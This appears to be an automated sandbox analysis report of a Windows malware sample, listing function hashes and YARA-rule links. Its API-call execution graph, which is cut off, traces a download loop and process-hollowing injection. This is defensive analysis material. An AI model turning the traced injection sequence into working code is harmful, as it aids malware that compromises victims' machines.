                                                                                                                                                                                                                                  • Opcode ID: 4ddb632a37e71dbb8163774fa76b26a2a3c39afe7dbb4ccb90ed3288b24ff7f4
                                                                                                                                                                                                                                  • Instruction ID: c99d473bc2d25d9dc8e01084d4d59e2ab26d5fc6c5f2987487e66581ccc3e0fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ddb632a37e71dbb8163774fa76b26a2a3c39afe7dbb4ccb90ed3288b24ff7f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89E04F727101105F47689A5BA484A6AB7EAFBC966136944F9E70EC7311DE31DC024790
                                                                                                                                                                                                                                  Function 06B6BED0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fd5b29c9159b4a45924d7df11d1679a706fb48f46e7a884c013464f7ff09bd10
                                                                                                                                                                                                                                  • Instruction ID: d1d910deb37c2a30922fbeeac0916fb205f2f6f41cec7e770d4a1e7b74c914c6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd5b29c9159b4a45924d7df11d1679a706fb48f46e7a884c013464f7ff09bd10
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6E0D8302167606FCB31DF3D98105977FF8AE4511430907AFF092C71A2CB689E158B91
                                                                                                                                                                                                                                  Function 06B6AFE8 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 67eb0da4630c748cbb3c12277102800ee000c7b741d89bee4601a10b7db873f9
                                                                                                                                                                                                                                  • Instruction ID: eebee5a1d9a6c5214539db7c3f074455f71eb528d2994419e243e918f83fe029
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67eb0da4630c748cbb3c12277102800ee000c7b741d89bee4601a10b7db873f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46E09B70901209FFCB04FFA5E80455DB7B9FB48300F105695D40593209DE726F51AB71
                                                                                                                                                                                                                                  Function 06B6EF58 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 30ab100bf1add327bc5f2371e985b4ee439a6e46d40227252df24771f28739d2
                                                                                                                                                                                                                                  • Instruction ID: 41b31762eb76282437aa011168744b422a6c1ed9fe3ae2767f28dffe0d598b26
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30ab100bf1add327bc5f2371e985b4ee439a6e46d40227252df24771f28739d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFE08C363002006FC310DA0EEC88E46FBADEFC8630B10802AFA09C7320CA30AC01C7A4
                                                                                                                                                                                                                                  Function 06B6BA10 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ab34fcbe1de7d7756e772bc53c9b3b2bf85d80080b30f3fd1b00be4750fb87e5
                                                                                                                                                                                                                                  • Instruction ID: 57ed163e12e568335828fe5e9f3aaffc4821f6bd2bef2e61f8760f73588eeb16
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab34fcbe1de7d7756e772bc53c9b3b2bf85d80080b30f3fd1b00be4750fb87e5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE04F321052597FCB019E94DC01DD73F69DF5A260B048196FA50575A2C231EA21DBE1
                                                                                                                                                                                                                                  Function 06B66561 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a23ad7517c17ef1ac5944a092fbddccf9ce2559919ac80a10fdb1fc6ec1392ff
                                                                                                                                                                                                                                  • Instruction ID: cff0ca2ac186de7d24605d40e0bb52743c5dcb9e70c36158472a6faff0e368a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a23ad7517c17ef1ac5944a092fbddccf9ce2559919ac80a10fdb1fc6ec1392ff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30E086725082519FDB867718F8112C537F1EFC568030AA6C5E5419F29DD7105D5783A2
                                                                                                                                                                                                                                  Function 06B6AD0C Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ff08e88bd3e7302ec867c9eaf49f0b5d2410f42ba200bb56ac5bb59f77be79ac
                                                                                                                                                                                                                                  • Instruction ID: adfb341bdf288e8ef009887b55a88a3894169ad665bae38419f4f15d6a0885d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff08e88bd3e7302ec867c9eaf49f0b5d2410f42ba200bb56ac5bb59f77be79ac
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5E08CB07217208B4AB0AF2AA45026BB3F8EB456103054DAAF517C3650CBA8E8144B8A
                                                                                                                                                                                                                                  Function 06B656B4 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d11d81b0a53ee5c2bf550c7d8f6ac52784d594dde830225c75d12c43cbf44891
                                                                                                                                                                                                                                  • Instruction ID: 176c34b7bb940cf562a1a90f2db85e735001e13303c010a118193a079f8aae62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d11d81b0a53ee5c2bf550c7d8f6ac52784d594dde830225c75d12c43cbf44891
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BE0127210421DBB9F41AE85DC50DEF3B29FF49360F00C451F91556110C671E8719BE1
                                                                                                                                                                                                                                  Function 06B6AFF8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e07fe987eebb55ad488cb0edfc33316cf3ca3c9210397a0a7b32caa8155149c7
                                                                                                                                                                                                                                  • Instruction ID: 72945ee9a1b4bba3b1ca319c964e97daf5ba8341f5cf4f960ee7966691ffb4b9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e07fe987eebb55ad488cb0edfc33316cf3ca3c9210397a0a7b32caa8155149c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67E08670A01209FFDB04FFA6E90056C77B9FB482007109699D805D3308DA322F01AB61
                                                                                                                                                                                                                                  Function 06B681A2 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 52cadd7aa575fe875211b8fc240e5ff4d7f1f36dc3092b1d47cf12ed8aef3bfe
                                                                                                                                                                                                                                  • Instruction ID: 0373893105fd5ca43c16c56214c8c522a9983a7190a75fb40093f8defc154071
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52cadd7aa575fe875211b8fc240e5ff4d7f1f36dc3092b1d47cf12ed8aef3bfe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D06C79E0424CCB8F40CFD5E44089CBBB9BB48300F000066E919AB204E6301914CF40
                                                                                                                                                                                                                                  Function 06B664F0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2dcb1993e7e869c261f84696766c5eec7f6b44e19dbde053e6dc72272f121125
                                                                                                                                                                                                                                  • Instruction ID: 1452aa518b75f27e22b303e07fe1c1267655cd715f9d4ae3236bab7c9f03d05e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dcb1993e7e869c261f84696766c5eec7f6b44e19dbde053e6dc72272f121125
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75C09B9140A3D56ECF9763345D6C6C63F367C1234470600C3D5C1D7593D34405079652
                                                                                                                                                                                                                                  Function 06B6BD17 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: af5d6e544a5a53d716acbbe263344c6561703fdf840f4548e7559817ced45d1d
                                                                                                                                                                                                                                  • Instruction ID: 85928ace40eadee66da71782d5a3b2f07d1624dbd3ed236610ec036db49cf688
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af5d6e544a5a53d716acbbe263344c6561703fdf840f4548e7559817ced45d1d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3D0C9B05047804FEB19AF6495582413F629B53324B35428ED0994B2E6D7B6C947DBD2
                                                                                                                                                                                                                                  Function 06B6AD28 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 770bf84e2c45c9ac96db7a7c68f0e2dd420b76c59d9661d529db983a7c62da8e
                                                                                                                                                                                                                                  • Instruction ID: cee3e4d294ef2455a3010b471da54eecb3afbc19a359dda251ca9aaae60ecac7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 770bf84e2c45c9ac96db7a7c68f0e2dd420b76c59d9661d529db983a7c62da8e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BC080F00017008FDF549F14954C3643A60FF41314B3046CD61194D1D1C372C543C7D1
                                                                                                                                                                                                                                  Function 06B65674 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: bc6fabc3a2a65dfaa10badbe09ad725075f26b771b07bd9c5b5034bfee67944c
                                                                                                                                                                                                                                  • Instruction ID: 7ba7697e745497bd35967d4e079502ae8b6929ecc4dac565a160256356b7c301
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc6fabc3a2a65dfaa10badbe09ad725075f26b771b07bd9c5b5034bfee67944c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FB012FB1D9600AB71C1B2714C64B2E9081FBB6700B50CD81330700050C8748475E237
                                                                                                                                                                                                                                  Function 06B647C3 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c782a2db4ec0614828329c15f082de6b377a15a555bd4fca3bd5257c31418210
                                                                                                                                                                                                                                  • Instruction ID: 1e6fb64b6a352ffde2577bcecc0adc964c81695d58a0ba29f579ed1522bb5273
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c782a2db4ec0614828329c15f082de6b377a15a555bd4fca3bd5257c31418210
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAC04C36A000099B8F00DBD4F4444DCB7B5EBC8226B108061D615A210496311D168B50

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 06B61238 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2d024607c34fb2ecd781ec739d5ba83ce79f917adb216afcdf40e1e86d0301f5
                                                                                                                                                                                                                                  • Instruction ID: 0c52b751badc4e4222f3d2e64497d8edeb7c9b2d3ecf038afe6b695f55de0f63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d024607c34fb2ecd781ec739d5ba83ce79f917adb216afcdf40e1e86d0301f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B7104B0E01218DFDB58DFBAD480A9DBBB2FF89304F209569E415AB354DB349842CF40
                                                                                                                                                                                                                                  Function 06B665A8 Relevance: 37.8, Strings: 30, Instructions: 319COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj
                                                                                                                                                                                                                                  • API String ID: 0-4292195388
                                                                                                                                                                                                                                  • Opcode ID: 89ce1219bfb03d2bccaecaa6d9674d39ed8a194dadf80ab1e1603d84cedc5417
                                                                                                                                                                                                                                  • Instruction ID: 7e78b82dd4b2c9cd1645cf6505d62efe64991dc892e5bf208e62c59d862619fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89ce1219bfb03d2bccaecaa6d9674d39ed8a194dadf80ab1e1603d84cedc5417
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4B1B470300B116BF71A67B0986277D76D7BB8BB04B98892CD2050F79ACFB16E059393
                                                                                                                                                                                                                                  Function 06B665B8 Relevance: 37.8, Strings: 30, Instructions: 313COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj$Dj
                                                                                                                                                                                                                                  • API String ID: 0-4292195388
                                                                                                                                                                                                                                  • Opcode ID: 374a69dcd70940f7313487484354f25facbc8ba0dfd1bf59a4a20a8d92c3f8a9
                                                                                                                                                                                                                                  • Instruction ID: 91dfa6b6d8cde06f597a067154133a0251204d6e99939895003e4a74f656e26f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 374a69dcd70940f7313487484354f25facbc8ba0dfd1bf59a4a20a8d92c3f8a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFA1A370300B116BF31A67B0986277D76D7BB8BB04B988A2CD2050F789CFB16E059397

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:41.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:480
                                                                                                                                                                                                                                  Total number of Limit Nodes:12
                                                                                                                                                                                                                                  execution_graph 1426 7ff72a022168 1427 7ff72a022192 InternetOpenW 1426->1427 1428 7ff72a0221cc InternetOpenUrlW 1427->1428 1429 7ff72a0221bf Sleep 1427->1429 1430 7ff72a022203 InternetOpenUrlW 1428->1430 1431 7ff72a022255 HttpQueryInfoA 1428->1431 1429->1427 1430->1431 1432 7ff72a02223a InternetCloseHandle Sleep 1430->1432 1433 7ff72a0222aa 1431->1433 1434 7ff72a022284 InternetCloseHandle InternetCloseHandle Sleep 1431->1434 1432->1427 1435 7ff72a022311 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1433->1435 1436 7ff72a0222b4 InternetCloseHandle InternetOpenUrlW 1433->1436 1434->1427 1438 7ff72a022390 1435->1438 1439 7ff72a022376 InternetCloseHandle InternetCloseHandle 1435->1439 1436->1435 1437 7ff72a0222f6 InternetCloseHandle Sleep 1436->1437 1437->1427 1441 7ff72a022398 InternetReadFile 1438->1441 1442 7ff72a0223e6 InternetCloseHandle InternetCloseHandle 1438->1442 1440 7ff72a02240f 1439->1440 1441->1438 1441->1442 1442->1440 1461 7ff72a021088 GetModuleHandleA GetProcAddress 1462 7ff72a0210bb 1461->1462 833 7ff72a023344 836 7ff72a0224d4 GetModuleFileNameW 833->836 837 7ff72a022555 836->837 844 7ff72a022550 836->844 838 7ff72a0225a9 837->838 839 7ff72a022593 837->839 879 7ff72a022414 ExpandEnvironmentStringsW 838->879 840 7ff72a0225c7 839->840 841 7ff72a02259d 839->841 880 7ff72a022454 ExpandEnvironmentStringsW 840->880 841->844 881 7ff72a022494 ExpandEnvironmentStringsW 841->881 845 7ff72a0225be 845->844 847 7ff72a022619 CreateProcessW 845->847 847->844 848 7ff72a022674 CreateFileW 847->848 848->844 849 7ff72a0226bb GetFileSize 848->849 850 7ff72a0226d9 849->850 851 7ff72a0226e3 CloseHandle 849->851 850->851 852 7ff72a0226f3 VirtualAlloc 850->852 851->844 853 7ff72a02272d ReadFile 852->853 854 7ff72a02271d CloseHandle 852->854 855 7ff72a02275a VirtualFree CloseHandle 853->855 856 7ff72a02277d CloseHandle GetThreadContext 853->856 854->844 855->844 857 7ff72a0227cd VirtualFree 856->857 858 7ff72a0227e5 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 856->858 857->844 859 7ff72a02286c VirtualFree 858->859 860 7ff72a022884 VirtualAllocEx 858->860 859->844 861 7ff72a022907 WriteProcessMemory 860->861 862 7ff72a0228ef VirtualFree 860->862 863 7ff72a02293d VirtualFree 861->863 865 7ff72a022955 861->865 862->844 863->844 864 7ff72a02298b WriteProcessMemory 864->865 866 7ff72a022a16 VirtualFree 864->866 865->864 871 7ff72a022a33 865->871 866->844 867 7ff72a022d24 WriteProcessMemory SetThreadContext 869 7ff72a022daa VirtualFree 867->869 870 7ff72a022dbf ResumeThread 867->870 868 7ff72a022aa5 RtlCompareMemory 868->871 876 7ff72a022af8 868->876 869->844 872 7ff72a022dd1 VirtualFree 870->872 873 7ff72a022de6 VirtualFree 870->873 871->867 871->868 872->844 873->844 874 7ff72a022d1f 874->867 875 7ff72a022c28 ReadProcessMemory WriteProcessMemory 877 7ff72a022cfd VirtualFree 875->877 878 7ff72a022d15 875->878 876->874 876->875 877->844 878->876 879->845 880->845 881->845 882 7ff72a023364 883 7ff72a0224d4 37 API calls 882->883 884 7ff72a023377 883->884 885 7ff72a023414 946 7ff72a02153c 885->946 890 7ff72a02342c ExitProcess 891 7ff72a023434 1180 7ff72a0240ac GetCurrentProcess OpenProcessToken 891->1180 895 7ff72a02344f 896 7ff72a023464 895->896 897 7ff72a0234b3 895->897 898 7ff72a0241ec 3 API calls 896->898 900 7ff72a0234c8 897->900 901 7ff72a023504 897->901 899 7ff72a023470 898->899 902 7ff72a023477 899->902 903 7ff72a02348a ExitProcess 899->903 904 7ff72a0241ec 3 API calls 900->904 908 7ff72a02355a 901->908 909 7ff72a023519 901->909 905 7ff72a0241ec 3 API calls 902->905 906 7ff72a0234d4 904->906 907 7ff72a023483 905->907 910 7ff72a0234db ExitProcess 906->910 911 7ff72a0234e3 906->911 907->903 912 7ff72a023492 907->912 1204 7ff72a023a3c 908->1204 1195 7ff72a0241ec CreateMutexA 909->1195 915 7ff72a023214 21 API calls 911->915 1215 7ff72a0232a4 912->1215 919 7ff72a0234e8 915->919 917 7ff72a023497 922 7ff72a0234ab ExitProcess 917->922 923 7ff72a02349e Sleep 917->923 926 7ff72a0234fc ExitProcess 919->926 927 7ff72a0234ef Sleep 919->927 923->917 924 7ff72a02352c ExitProcess 925 7ff72a023534 1199 7ff72a023214 925->1199 927->919 930 7ff72a023572 933 7ff72a0241ec 3 API calls 930->933 931 7ff72a0235c6 CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 932 7ff72a023539 934 7ff72a02354d ExitProcess 932->934 935 7ff72a023540 Sleep 932->935 936 7ff72a02357e 933->936 935->932 937 7ff72a023598 ExitProcess 936->937 938 7ff72a023585 936->938 939 7ff72a0241ec 3 API calls 938->939 940 7ff72a023591 939->940 940->937 941 7ff72a0235a0 940->941 942 7ff72a0232a4 44 API calls 941->942 943 7ff72a0235a5 942->943 944 7ff72a0235b9 ExitProcess 943->944 945 7ff72a0235ac Sleep 943->945 945->943 1224 7ff72a02149c LoadLibraryA GetProcAddress 946->1224 948 7ff72a0215c6 1225 7ff72a02149c LoadLibraryA GetProcAddress 948->1225 950 7ff72a0215e0 1226 7ff72a0214ec LoadLibraryA GetProcAddress 950->1226 952 7ff72a0215fa 1227 7ff72a0214ec LoadLibraryA GetProcAddress 952->1227 954 7ff72a021614 1228 7ff72a0214ec LoadLibraryA GetProcAddress 954->1228 956 7ff72a02162e 1229 7ff72a0214ec LoadLibraryA GetProcAddress 956->1229 958 7ff72a021648 1230 7ff72a0214ec LoadLibraryA GetProcAddress 958->1230 960 7ff72a021662 1231 7ff72a0214ec LoadLibraryA GetProcAddress 960->1231 962 7ff72a02167c 1232 7ff72a0214ec LoadLibraryA GetProcAddress 962->1232 964 7ff72a021696 1233 7ff72a0214ec LoadLibraryA GetProcAddress 964->1233 966 7ff72a0216b0 1234 7ff72a0214ec LoadLibraryA GetProcAddress 966->1234 968 7ff72a0216ca 1235 7ff72a02149c LoadLibraryA GetProcAddress 968->1235 970 7ff72a0216e4 1236 7ff72a02149c LoadLibraryA GetProcAddress 970->1236 972 7ff72a0216fe 1237 7ff72a02149c LoadLibraryA GetProcAddress 972->1237 974 7ff72a021718 1238 7ff72a02149c LoadLibraryA GetProcAddress 974->1238 976 7ff72a021732 1239 7ff72a0214ec LoadLibraryA GetProcAddress 976->1239 978 7ff72a02174c 1240 7ff72a0214ec LoadLibraryA GetProcAddress 978->1240 980 7ff72a021766 1241 7ff72a0214ec LoadLibraryA GetProcAddress 980->1241 982 7ff72a021780 1242 7ff72a0214ec LoadLibraryA GetProcAddress 982->1242 984 7ff72a02179a 1243 7ff72a0214ec LoadLibraryA GetProcAddress 984->1243 986 7ff72a0217b4 1244 7ff72a0214ec LoadLibraryA GetProcAddress 986->1244 988 7ff72a0217ce 1245 7ff72a0214ec LoadLibraryA GetProcAddress 988->1245 990 7ff72a0217e8 1246 7ff72a0214ec LoadLibraryA GetProcAddress 990->1246 992 7ff72a021802 1247 